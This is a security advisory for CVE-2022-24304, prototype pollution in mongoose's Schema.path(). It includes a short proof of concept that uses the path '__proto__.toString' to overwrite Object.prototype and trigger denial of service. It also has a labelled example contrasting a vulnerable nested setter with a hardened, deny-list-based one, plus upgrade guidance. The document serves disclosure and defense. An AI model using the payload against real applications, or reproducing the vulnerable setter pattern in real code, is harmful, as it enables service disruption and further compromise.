CVE-2022-24304
CRITICAL (9.8): Mongoose Vulnerable to Prototype Pollution in Schema Object
Description
Mongoose is a MongoDB object modeling tool designed to work in an asynchronous environment. Affected versions of this package are vulnerable to Prototype Pollution: the `Schema.path()` function does not reject path segments that reach the object prototype when it sets the `schema` object. This allows modification of the `Object` prototype and can be manipulated into a Denial of Service (DoS) attack.

### Proof of Concept

```js
// poc.js
const mongoose = require('mongoose');

const schema = new mongoose.Schema();

// A dotted path whose first segment is `__proto__` walks up to Object.prototype
const malicious_payload = '__proto__.toString';
schema.path(malicious_payload, [String]);

const x = {};
console.log(x.toString()); // throws: Object.prototype.toString has been overwritten (Denial of Service (DoS))
```

### Impact

Beyond the DoS shown above, the same primitive can be manipulated to enable other classes of attack, such as Remote Code Execution or Property Injection.
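The advisory does not show how the fixed release handles this, so the following is an added example, not mongoose's code: a simplified model of writing a dotted schema path into a nested object, in a naive form that reaches `Object.prototype` and a hardened form that rejects prototype-reaching segments before traversing, plus a small check for detecting pollution after processing untrusted schema definitions. Function names and the `FORBIDDEN_SEGMENTS` list are assumptions of this example.

```javascript
// Added example (not mongoose's code): a simplified model of how a dotted
// schema path like "address.city" is written into a nested object, in the
// naive form and in a hardened form that refuses prototype-reaching segments.

// Assumed deny-list; these segments let a dotted path climb to Object.prototype.
const FORBIDDEN_SEGMENTS = new Set(['__proto__', 'constructor', 'prototype']);

// Returns true when every dot-separated segment is an ordinary, non-empty key.
function isSafeSchemaPath(path) {
  if (typeof path !== 'string' || path.length === 0) return false;
  return path.split('.').every(seg => seg.length > 0 && !FORBIDDEN_SEGMENTS.has(seg));
}

// Naive nested assignment: walks the path, creating objects as needed.
// With "__proto__.x" the walk lands on Object.prototype and writes to it.
function setNestedUnsafe(target, path, value) {
  const segs = path.split('.');
  let cur = target;
  for (let i = 0; i < segs.length - 1; i++) {
    if (cur[segs[i]] === undefined) cur[segs[i]] = {};
    cur = cur[segs[i]];
  }
  cur[segs[segs.length - 1]] = value;
  return target;
}

// Hardened: validate the path first, and only ever traverse own properties,
// so an inherited key (like __proto__) can never become the cursor.
function setNestedSafe(target, path, value) {
  if (!isSafeSchemaPath(path)) throw new TypeError(`unsafe schema path: ${path}`);
  const segs = path.split('.');
  let cur = target;
  for (let i = 0; i < segs.length - 1; i++) {
    if (!Object.prototype.hasOwnProperty.call(cur, segs[i])) cur[segs[i]] = {};
    cur = cur[segs[i]];
  }
  cur[segs[segs.length - 1]] = value;
  return target;
}

// Detection helper: reports whether Object.prototype now carries `key` as an
// own property, e.g. as a post-condition check after loading schemas.
function prototypeHasOwn(key) {
  return Object.prototype.hasOwnProperty.call(Object.prototype, key);
}
```

For the real package the fix is to upgrade to a release outside the affected range (6.4.6 or later); the path validation above is only a model of the check that closes the bug.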
Affected packages (1)
- npm/mongoose: >= 6.0.0, < 6.4.6
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | CRITICAL 9.8 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
References (6)
- ADVISORY: https://nvd.nist.gov/vuln/detail/CVE-2022-24304
- WEB: https://github.com/Automattic/mongoose/blob/51e758541763b6f14569744ced15cc23ab8b50c6/lib/schema.js#L88-L141
- WEB: https://github.com/Automattic/mongoose/commit/6a197316564742c0422309e1b5fecfa4faec126e
- WEB: https://github.com/Automattic/mongoose/commit/a45cfb6b0ce0067ae9794cfa80f7917e1fb3c6f8
- WEB: https://github.com/Automattic/mongoose/issues/12085
- WEB: https://huntr.dev/bounties/055be524-9296-4b2f-b68d-6d5b810d1ddd